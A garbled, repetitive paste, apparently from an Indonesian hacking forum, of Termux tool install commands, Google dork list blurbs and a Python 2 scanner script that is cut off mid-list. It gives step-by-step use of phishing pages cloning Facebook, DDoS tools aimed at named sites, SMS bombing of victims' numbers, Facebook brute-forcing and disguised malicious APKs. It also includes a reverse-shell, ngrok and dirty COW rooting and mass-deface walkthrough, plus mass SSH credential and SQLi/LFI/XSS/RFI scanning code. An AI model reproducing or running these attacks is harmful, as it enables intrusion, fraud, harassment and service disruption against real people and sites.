rsf.py Cara pake cd routersploit ./ rsf.py use scanners/autopwn show options set target 192.168.1.1 set port 8080 set threads 10 masukkan exploitsnya set target 192.168.1.1 -check -run tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu&#8230; $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (```Install``` *Weeman* ) $ apt update && apt upgrade -y $ apt install git -y $ apt install python2 -y $ git clone https://github.com/evait-security/weeman $ cd weeman $ chmod 777 weeman.py $ python2 weeman.py Contoh $ set url http://facebook.com $ set action_url http://facebook.com run (Bisa diganti phising nya, kalau Twitter ya bisa ataupun yg lain) *Ikuti Langkah Demi Langkah* (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py Ikuti Langkah Demi Langkah (```Install``` *SQLMAP*) $ apt update $ apt install python $ apt install python2 $ apt install git $ gi clone https://github.com/sqlmapproject/sqlmap $ cd sqlmap $ Python2 sqlmap.py Exemple:- Python2 sqlmap.py -u website --dbs -D acuart --tables -D acuart -T users --columns -D acuart -T users -C name,email,phone -dump Ikuti Langkah Demi Langkah Lacak ip git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak bbom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjh --------------------------------------------------------------------- *1.Spammer SMS Grab Install Spammernya dulu* $pkg install python2 $pip2 install requests $pkg install git $git clone https://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $ls $chmod +x spammer.py $python2 spammer.py --delay 30 nomor korban. --------------------------------------------------------------------------------------- *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py --------------------------------------------------------------------------------------- *2.Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php --------------------------------------------------------------------------------------- 3. Install webdav $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav $ curl -k -O https://pastebin.com/raw/HnVyQPtR $ mv HnVyQPtR webdav.py $ python2 webdav.py --------------------------------------------------------------------------------------- *2. Xerxes* $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 --------------------------------------------------------------------------------------- *3. Torshammer* $ pkg update $ pkg install git $ Pkg install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py -T -t seword.com ( web y ang kalian attack ) #mr khanz'''TOOL TERMUX Cara Install D-tect tool di android termux (command ) : $ apt install git $ apt install python2 $ git clone https://github.com/shawarkhanethicalhacker/D-TECT $ ls $ cd D-TECH $ chmod +x d-tect.py $ python2 d-tect.py cara uninstall tool termux rm -rf toolsnya cara buat virus cd /sdcard cd vbug ls chmod vbug.py chmod -v vbug.py python2 vbug.py irssi /connet irc.freenode.net /nick w3wandroid /join #modol _________________________ DDOS via Termux 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 104.27.146.125 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py _________________________________________ Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy ________________________________________ musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak musik ________________________________________ Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah ________________________________________ Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya _______________________________________ Menampilkan animasi kereta :v $ pkg install sl $ sl _______________________________________ menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch _______________________________________ menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya _______________________________________ $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dgn mengetik nomornya.  Tutorial membuat virus seperti aplikasi aslinya🚨 Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh auto boot fb git clone https://github.com/Senitopeng/BotFbBangDjon.git cd BotFbBangDjon python2 bangdjon.py melihat id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction cara membuat virus cd Vbug/vbug.py cd /storage/emulated/0/Vbug cd vbug Python2 vbug.py CRACK PASSWORD HASH git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ cd FHX-Hash-Killer python2 FHXHashKiller.py git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py pkg install irssi irssi (enter) /connect chat.freenode.net /nick oki /join #mrmaze Cara install Metasploit di termux (No Root) ~ apt update && apt upgrade ~ apt install curl ~ curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh ~ chmod +x metasploit.sh ~ ./metasploit.sh ... Tunggu proses instalasi sekitar 30-40 menit tergantung koneksi internet ... ( hack fb via termux ) $apt update $apt upgrade $apt install python2 $apt install python2-dev $apt install wget $dip2 install mechanize $cd/sterage/emulated/0 $python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) $storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder ) =tinggal tunggu fassword nya muncul Jika beruntung *silahkan mencoba* tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools pip install mps_youtube pip install youtube_dl apt install mpv mpsyt /judul $ pkg update && pkg upgrade CHATTING VIA TERMUX $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam 100% work boom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjhj +6282399188718 Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (```Install``` *SpamTsel*) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done Cara Root Server Di Termux Dengan Ngrok Perl/PHP BackConnecter Mass Deface. 1. Install~ Buka Termux 2. Install Ngrok Registrasi Autthokennya. (http://ngrok.com/download;http://ngrok.com/signup) $ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip $ unzip ngrok-stable-linux-arm.zip ngrok $ ./ngrok authtoken JWJDKNxxxxxxxxxx $ ./ngrok tcp port :~# Welcome : Plan Free "0.tcp.ngrok.io:port-ngrok ~> localhost:port" 3. Download Perl/PHP Backconnecter (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) dan Edit file nya, cari $ip dan $port ganti dengan (0.tcp.ngrok.io:port-ngrok) ~>Upload ke website (PERL: ON)(PHP: ON) 5. in termux command : $ nc -lnvp port 6. in backdoor shell : $ perl perl-reverse-shell.pl (atau) > http://situs.co.li/perl-reverse-shell.php (Run the script simply by browsing to the newly uploaded file in your web browser) .----(after backconnect successfully)--- 7. upload LOCALROOT $ wget https://domain.com/localroot/dirty $ chmod 777 dirty $ ./dirty New password: ndasmu (successfully rooted) 8. import TTY shell ===>jika menggunakan dirty<=== $ echo "import pty; pty.spawn('/bin/bash')" > /tmp/sad.py $ python /tmp/sad.py ===>jika menggunakan cowroot<=== $ python -c 'import pty;pty.spawn("/usr/bin/passwd")' (https://evertpot.com/189/) .-------------------------------------------- 9. login as ROOT $ su rintoar Password: ndasmu .-------------------------------------------- 10 ./mass (https://m.youtube.com/watch?v=HPQQok40v78) .-------------------------------------------- WEEMAN [✓] apt update && apt upgrade -y apt install git -y apt install python2 -y git clone https://github.com/evait-security/weeman cd weeman chmod 777 weeman.py python2 weeman.py Ex set url http://facebook.com set action_url http://facebook.com run ___________________________________________ Hunner framework apt update apt install python apt install git -y git clone https://github.com/b3-v3r/Hunner cd Hunner chmod 777 hunner.py python hunner.py ___________________________________________ SQLMAP [✓] apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap cd sqlmap Python2 sqlmap.py ______ Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump ___________________________________ DDOS XERXES [✓] clang xerxes.c -o xerxes ./xerxes website 80 ___________________________________ DDOS TORSHAMMER [✓] apt-get update apt-get install python2 apt-get install tor apt-get install git git clone https://github.com/dotfighter/torshammer.git cd torshammer python2 torshammer.py -T -t website ___________________________________ BRUTEFORCE [✓] apt update apt upgrade apt install python apt install pip pip install wordlist apt install worlist Wordlist -h cd /sdcard Cat pas.txt ___________________________________ Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com ___________________________________ Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py ___________________________________ BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py ___________________________________ HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run ___________________________________________ RED HAWK apt update apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK chmod +x rhawk.php apt install php ls php rhawk.php ___________________________________________ D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com ___________________________________________ viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com __________________ Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py PERKIRAAN cuaca curl http://wttr.in/ (lokasi) tool Routersploit apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py Cara pake cd routersploit ./ rsf.py use scanners/autopwn show options set target 192.168.1.1 set port 8080 set threads 10 masukkan exploitsnya set target 192.168.1.1 -check -run tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu&#8230; $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (```Install``` *Weeman* ) $ apt update && apt upgrade -y $ apt install git -y $ apt install python2 -y $ git clone https://github.com/evait-security/weeman $ cd weeman $ chmod 777 weeman.py $ python2 weeman.py Contoh $ set url http://facebook.com $ set action_url http://facebook.com run (Bisa diganti phising nya, kalau Twitter ya bisa ataupun yg lain) *Ikuti Langkah Demi Langkah* (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py Ikuti Langkah Demi Langkah (```Install``` *SQLMAP*) $ apt update $ apt install python $ apt install python2 $ apt install git $ gi clone https://github.com/sqlmapproject/sqlmap $ cd sqlmap $ Python2 sqlmap.py Exemple:- Python2 sqlmap.py -u website --dbs -D acuart --tables -D acuart -T users --columns -D acuart -T users -C name,email,phone -dump Ikuti Langkah Demi Langkah Lacak ip git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak bbom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjh --------------------------------------------------------------------- *1.Spammer SMS Grab Install Spammernya dulu* $pkg install python2 $pip2 install requests $pkg install git $git clone https://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $ls $chmod +x spammer.py $python2 spammer.py --delay 30 nomor korban. --------------------------------------------------------------------------------------- *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py --------------------------------------------------------------------------------------- *2.Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php --------------------------------------------------------------------------------------- 3. Install webdav $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav $ curl -k -O https://pastebin.com/raw/HnVyQPtR $ mv HnVyQPtR webdav.py $ python2 webdav.py --------------------------------------------------------------------------------------- *2. Xerxes* $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 --------------------------------------------------------------------------------------- *3. Torshammer* $ pkg update $ pkg install git $ Pkg install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py -T -t [8/11 18.11] BOT X3NONOLIMIT: Hack FACEBOOK *apt update && apt upgrade *pkg install python2 && pkg install wget *pip2 install mechanize && pip2 install request *pkg install git *git clone https://github.com/tikuskecil/multi-bruteforce-facebook *cd multi-bruteforce-facebook *ls *python2 MBF.py

7,000 Dorks for hacking into various sites

SuperDorker gives you a huge list of websites for 0day attacks from Google Dorks

Nice list of google dorks for SQL injection

Approx 10.000 lines of Google dorks search queries - Use this for research purposes only

Operators for google search, list of dorks, resources for advanced google search.

GoogleDorks Toolkit is a powerful automated tool for google dorks, designed for pentration tester, ethical hackers and bug hunters to detect harmful security vulnerabilities using Google Dorks techniques. It has methods to bypass google captcha and search in a list of any possible program in wild.

Updated 6000 Sql Injection Google Dork 2021

List of Google dorks to find VDPs and Bug Bounty Programs

List of Google Dorks for sites that have responsible disclosure program & bug bounty program

#!/usr/bin/env python import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6", "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp[i] == 256: tmp[i] = 0 tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nDorking...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count < numlinks: start = source.find('_t" href', start, end) end = source.find(' onmousedown="return pk', start, end) link = source[start+10:end-1].replace("amp;","") self.queue.put(link) start = end end = len(source) count = count + 1 self.page += 1 if option == '1': for i in range(10): thread = ScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '2': for i in range(10): thread = LScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '3': for i in range(10): thread = XScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '4': for i in range(10): thread = RScanClass(self.queue, self.shell) thread.setDaemon(True) thread.start() self.queue.join() class ScanClass(threading.Thread): """Scans for Sql errors and ouputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.schar = "'" self.file = 'sqli.txt' def run(self): """Scans Url for Sql errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np test = site + self.schar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("error in your SQL syntax", data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('oracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('system.data.oledb', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('SQL command net properly ended', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('atoracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('java.sql.sqlexception', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('query failed:', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('postgresql.util.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_fetch', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Error:unknown', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database Engine', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Microsoft OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_numrows', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('mysql_num', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Invalid Query', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('FetchRow', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Syntax error', data, re.I)): self.mssql(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def mysql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + W+url else: print O+"MySql: " + url + W write = open(self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() def mssql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file).read() if url in read: print G+'Dupe: ' + url + W else: print O+"MsSql: " + url + W write = open (self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() class LScanClass(threading.Thread): """Scans for Lfi errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.file = 'lfi.txt' self.queue = queue self.lchar = '../' def run(self): """Checks Url for File Inclusion errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: lsite = site.rsplit('=', 1)[0] if lsite[-1] != "=": lsite = lsite + "=" test = lsite + self.lchar global vuln global invuln global np try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("failed to open stream: No such file or directory", data, re.I)): self.lfi(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def lfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Lfi: " + url + W write = open(self.file, "a+") write.write('[LFI]: ' + url + "\n") write.close() class XScanClass(threading.Thread): """Scan for Xss errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.xchar = """<ScRIpT>alert('xssBYm0le');</ScRiPt>""" self.file = 'xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("xssBYm0le", data, re.I)): self.xss(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def xss(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Xss: " + url + W write = open(self.file, "a+") write.write('[XSS]: ' + url + "\n") write.close() class RScanClass(threading.Thread): """Scans for Rfi errors and outputs to file""" def __init__(self, queue, shell): threading.Thread.__init__(self) self.queue = queue self.file = 'rfi.txt' self.shell = shell def run(self): """Checks Url for Remote File Inclusion vulnerability""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np rsite = site.rsplit('=', 1)[0] if rsite[-1] != "=": rsite = rsite + "=" link = rsite + self.shell + '?' try: conn = urllib2.Request(link) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall('uname -a', data, re.I)): self.rfi(link) vuln += 1 else: print B+link + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def rfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Rfi: " + url + W write = open(self.file, "a+") write.write('[Rfi]: ' + url + "\n") write.close() class Atest(threading.Thread): """Checks given site for Admin Pages/Dirs""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Admin Page/Dir exists""" while True: try: site = self.queue.get(False) except Queue.Empty: break try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) print site found.append(site) self.queue.task_done() except urllib2.URLError: self.queue.task_done() def admin(): """Create queue and threads for admin page scans""" print 'Need to include http:// and ending /\n' site = raw_input('Site: ') queue = Queue.Queue() dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html', 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html', 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html', 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 